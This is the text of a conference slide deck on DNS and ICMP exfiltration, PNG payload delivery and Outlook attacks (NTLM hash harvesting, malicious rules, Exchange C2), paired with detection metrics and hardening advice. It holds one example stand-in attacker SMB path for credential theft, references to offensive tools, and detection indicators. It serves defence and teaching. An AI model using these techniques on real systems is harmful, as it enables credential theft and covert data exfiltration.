Advanced

exploitation
techniques and
defence strategies
2

#whoami
👉 Chirag Savla
👉 Twitter – @chiragsavla94
👉 Interest area – Red Teaming, Application Security,
Penetration Testing
👉 Blog – https://3xpl01tc0d3r.blogspot.com
3

#whoami
👉 Udayakumar C
👉 Twitter – @udayakumar2526
👉 Interest area – Threat Hunting, Incident Response
“
As an offensive researcher, if you can dream
it, someone has likely already done it… and
that someone isn’t the kind of person who
speaks at security cons.
— Matt Graeber
5

Agenda

▸ DNS attacks
▸ PNG & ICMP attacks

▸ Outlook attacks

▸ Best Practices
6

DNS attacks
▸ Data Exfiltration over DNS & DNS Tunneling
▸ Detection Metrics
▸ Visual Inspection
7

About DNS

▸ The Domain Name System (DNS) is a system designed so we as humans

don’t have to remember IP addresses when browsing the internet.
▸ DNS Protocol is mainly designed to resolve a hostname query to an IP
address response.
▸ The query is performed recursively, starting from the root DNS name servers
until reaching the authoritative name server defined for queried domain.
8

Data Exfiltration over DNS & DNS Tunneling

▸ DNS Data exfiltration is way to exchange data between 2 computers without

any directly connection, the data is exchanged through DNS protocol on
intermediate DNS servers
▸ DNS Tunneling is a method that encodes the data of other programs or
protocols in DNS queries and responses.
▸ Why DNS ?
▹ A cornerstone of the Internet; available in almost every network
▹ Rarely monitored compared to HTTP, FTP and e-mail protocols
9
Targeted Attacks against Banks in the Middle
East

https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html
10
FIN7 Spear Phishing Campaign Targets
Personnel Involved in SEC Filings

https://www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html
11

Demo Time
This is not rocket science.
12

Detection Metrics

▸ Lots of requests to domains/single domain

▸ Spike in DNS byte count across normal traffic patterns
▸ MD5, SHA1, SHA256 hashed subdomains
▸ Encrypted payloads
▸ Plain text requests of subdomains
▸ DNS replies have private addresses
▸ DNS replies have single IP address
▸ DNS replies have patterned encoding
▸ Packet size outside the normal distribution
▸ Pattern of many requests to specific domains in round robin pattern
13

Detection Metric 1 - High volume of traffic

14
Detection Metric 2 - Increase in Bytes
Transferred
15

Detection Metric 3 - Anomalous Queries

16

Demo Time
This is not rocket science.
17

Visual Inspection
Legitimate DNS Traffic Tunneled DNS Traffic
DNS requests will always go through the internal DNS servers. DNS requests can (but don’t need to) bypass the local DNS
server.
Hostnames will look like/include dictionary words. Hostnames will look nothing like words a human can read (high
level of entropy).
Short-ish DNS queries and responses. Very long DNS queries and responses.
Small percentage of numerical characters in hostnames. High percentage of numerical characters in hostnames.

Hostnames are unlikely to include repeated consonants, or Hostnames will very frequently include repeated consonants,
blocks including only consonants and numbers. and/or blocks including only consonants and numbers.
DNS records will likely be of most common types ie: A records, Likely use uncommon DNS record types heavily. Ie: TXT
MX records and so on. records.
DNS traffic to different IPs /domains will be somewhat “even”. Very high volume of DNS traffic to a single IP and/or domain is
likely (but not mandatory)

Likely to show just a few hostnames per domain. Likely to show a huge number to hostnames per domain.
A DNS request is preceded by another request from some A DNS request unlikely to be preceded by another request from
application. some application.
18

PNG & ICMP exploits

▸ Delivering payloads using PNG file
▸ Data Exfiltration over ICMP
▸ Detection Metrics
19

Delivering payloads using PNG file

▸ A PNG file is an image file stored in the Portable Network Graphic (PNG)
format. It contains a bitmap of indexed colors and uses lossless
compression, similar to a .GIF file but without copyright limitations. PNG files
are commonly used to store graphics for web images.

▸ Why PNG ?
Image files are not monitored nor scanned. It can be hosted on any legit sites
which are allowed in corporate.
20
HAMMERTOSS: Stealthy Tactics Define a
Russian Cyber Threat Group

https://assets.documentcloud.org/documents/2186063/apt29-hammertoss-stealthy-tactics-define-a.pdf
21

Data Exfiltration over ICMP

▸ Internet Control Message Protocol (ICMP) is a TCP/IP network layer protocol

that provides troubleshooting, control and error message services. ICMP is
most frequently used in operating systems for networked computers.

▸ Why ICMP?
ICMP packets are rarely monitored.
22
Cyber Espionage is Alive and Well: APT32 and
the Threat to Global Corporations

• C2 Communication via ICMP

• Reverse shell creation
• File system manipulation
PHOREAL
• Registry manipulation
• Process creation
• File upload

https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html
23

Demo Time
This is not rocket science.
24

Detection Metrics

▸ Encrypted/Plaintext ICMP echo packets

▸ Spike in ICMP packet byte count across normal traffic patterns
▸ Lots of echo request to one Domain/IP
▸ ICMP packet size outside the normal distribution
▸ Pattern of many requests to specific domain/ip
▸ PowerShell process making HTTP/HTTPS request to image file.
25

Demo Time
This is not rocket science.
26

Outlook attacks
▸ Credentials Harvesting
▸ Attacking outlook rules
▸ Establish covert C2 channel via outlook
▸ Detection Metrics
27

Credentials Harvesting

▸ Leaking of hashes is not new. It is caused by a design flaw in Windows

related to their single sign-on implementation. If a server requests for the
user to authenticate, Windows will try to do so using the user's credentials.
This way the user doesn't need to provide his/her credentials for each
individual server. The downside is that any server can request authentication
and Windows will happily comply.
▸ There are couple of ways to gain the credential from the user via outlook
▹ Send email which contains SMB call to the server which is under attacker’s control
▹ Eg:- \\attackerserver\demo.jpg
▹ Send email with malicious RTF file (CVE-2018-0950)
28

Credentials Harvesting
29

Attacking outlook rules

▸ A rule is an action that Outlook runs automatically on incoming or outgoing

messages. You can choose what triggers the rule as well as the actions.
Eg:- You can create a rule to move all emails from your manager to a
separate folder or to delete all emails with “Buy Now!” text in subject.
▸ Patches released by Microsoft:
CVE-2017-8506, CVE-2017-8507-CVE-2017-8508
30

Exploiting outlook rules

31

Establish covert C2 channel via outlook

Getting access to At times we want to To this end,

an internal network fly below the radar communicating
is always great, and ensure our directly through an
keeping this access doesn’t get Exchange server
access can be a detected or can be very
whole other blocked by beneficial and
challenge. traditional network solve both
based solutions. challenges
32

Establish covert C2 channel via outlook

👤 ker
Attac
Exchange
👤 m
Victi
33

Exploiting outlook rules

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html
34

Demo Time
This is not rocket science.
35

Detection Metrics

▸ Monitor all outwards communications on port 445/tcp, 137/tcp, 139/tcp, along

with 137/udp and 139/udp.
▸ Enable logging and monitor for PowerShell.
▸ Use notruler tool for detecting attacks which are performed using ruler.
▸ Monitor for file written in
“%systemdrive%\windows\ServiceProfiles\LocalService\AppData\Local\Temp\
TfsStore”.
▸ Monitor IIS logs of exchange server if any user-agent contains “Ruler”.
▸ Monitor for child process spawn by MS office suite.
36

Best Practices

▸ Block all outwards communications on port 445/tcp, 137/tcp, 139/tcp, along with
137/udp and 139/udp.
▸ Block NT LAN Manager (NTLM) Single Sign-on (SSO) authentication.
▸ Always use complex passwords, that are difficult to cracked.
▸ Block all outwards ICMP requests.
▸ Block all outwards DNS requests which are send directly from the system. All
systems should request the internal DNS servers & only internal DNS server should
be allowed to send the DNS requests outside the environment.
▸ Apply the security patches in timely manner.
▸ Enable Attack Surface Reduction Rules (ASR).
▸ Implement Applocker & Device Guard.
▸ Disable PowerShell in the environment.
▸ Implement DNS sinkhole.
▸ Implement 2FA for authentication.
37

Credits

Thanks to First & CERT-In for granting us the privilege

to present.
Special thanks to @_staaldraad & @mr64bit who
helped in getting some bugs fix.
38

Reference

▸ https://www.blackhillsinfosec.com/powershell-dns-command-control-
with-dnscat2-powershell/
▸ https://silentbreaksecurity.com/malicious-outlook-rules/
▸ https://sensepost.com/blog/2017/liniaal-empire-through-exchange/
▸ https://www.youtube.com/watch?v=tuc8cwOAAcA
▸ https://github.com/peewpw/Invoke-PSImage
▸ https://github.com/inquisb/icmpsh
▸ http://www.labofapenetrationtester.com/2015/05/week-of-
powershell-shells-day-5.html
39

THANKS!
Any questions?
You can find us at @chiragsavla94 & @udaykumar2526